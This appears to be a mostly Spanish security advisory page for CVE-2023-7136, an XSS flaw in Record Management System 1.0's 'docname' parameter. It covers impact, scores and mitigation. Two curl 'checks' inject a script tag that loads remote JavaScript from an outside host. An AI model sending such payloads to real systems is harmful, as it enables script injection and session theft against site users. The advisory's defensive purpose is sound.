Plataforma
php
Componente
cves
Corregido en
1.0.1
Se ha identificado una vulnerabilidad de Cross-Site Scripting (XSS) en el sistema Record Management System versión 1.0. Esta vulnerabilidad reside en el manejo del argumento 'docname' dentro del componente Document Type Handler, específicamente en el archivo /main/doctype.php. La inyección de código malicioso a través de este argumento puede permitir a un atacante ejecutar scripts en el navegador de un usuario, comprometiendo la confidencialidad e integridad de la información. La versión 1.0.1 ya incluye la corrección.
Un atacante puede explotar esta vulnerabilidad inyectando código JavaScript malicioso a través del parámetro 'docname'. Este código se ejecutará en el contexto del navegador del usuario que acceda al recurso vulnerable, permitiendo al atacante robar cookies de sesión, redirigir al usuario a sitios web maliciosos, o modificar el contenido de la página web. El impacto potencial es significativo, ya que un atacante podría comprometer cuentas de usuario, obtener acceso a información confidencial, o incluso realizar acciones en nombre del usuario. La naturaleza pública de la explotación aumenta el riesgo de ataques generalizados.
Esta vulnerabilidad ha sido divulgada públicamente, lo que aumenta la probabilidad de explotación. La disponibilidad de un Proof of Concept (PoC) facilita aún más la tarea de los atacantes. Aunque la CVSS score es baja (2.4), la facilidad de explotación y el potencial impacto justifican una respuesta rápida. La vulnerabilidad ha sido registrada en la base de datos VDB bajo el identificador VDB-249139.
Organizations using Record Management System version 1.0 are at risk. This includes businesses relying on this system for document storage and retrieval, particularly those with limited security expertise or those who have not implemented robust input validation practices. Shared hosting environments where multiple users share the same server instance are also at increased risk.
• generic web:
curl -s -X POST "http://your-record-management-system/main/doctype.php?docname=><script src='https://js.rip/b23tmbxf49'></script>" | grep -i script• generic web:
curl -I "http://your-record-management-system/main/doctype.php?docname=><script src='https://js.rip/b23tmbxf49'></script>" | grep -i scriptdisclosure
patch
Estado del Exploit
EPSS
0.13% (33% percentil)
Vector CVSS
La mitigación principal para esta vulnerabilidad es actualizar a la versión 1.0.1 del Record Management System, que incluye la corrección para la vulnerabilidad XSS. Si la actualización inmediata no es posible, se recomienda implementar medidas de seguridad adicionales, como la validación y el saneamiento de todas las entradas de usuario en el lado del servidor. Además, se puede configurar un Web Application Firewall (WAF) para bloquear solicitudes que contengan patrones de inyección de script. Monitorear los registros del servidor en busca de intentos de inyección de código también puede ayudar a detectar y responder a ataques.
Actualizar a una versión parcheada del software. Si no hay una versión disponible, sanitizar las entradas del usuario en el parámetro 'docname' en el archivo '/main/doctype.php' para evitar la ejecución de código JavaScript malicioso. Implementar validación y codificación de salida para prevenir ataques XSS (Cross-Site Scripting).
Análisis de vulnerabilidades y alertas críticas directamente en tu correo.
CVE-2023-7136 is a cross-site scripting (XSS) vulnerability in Record Management System version 1.0, allowing attackers to inject malicious scripts via the 'docname' parameter.
If you are using Record Management System version 1.0, you are potentially affected by this vulnerability. Upgrade to version 1.0.1 to mitigate the risk.
The recommended fix is to upgrade to Record Management System version 1.0.1. As a temporary workaround, implement input validation and sanitization on the 'docname' parameter.
While active exploitation is not confirmed, the vulnerability has been publicly disclosed and a proof-of-concept may be available, increasing the risk of exploitation.
Refer to the vendor's official advisory for Record Management System, which should detail the vulnerability and provide instructions for remediation.
Sube tu archivo de dependencias y detecta esta y otras CVEs al instante.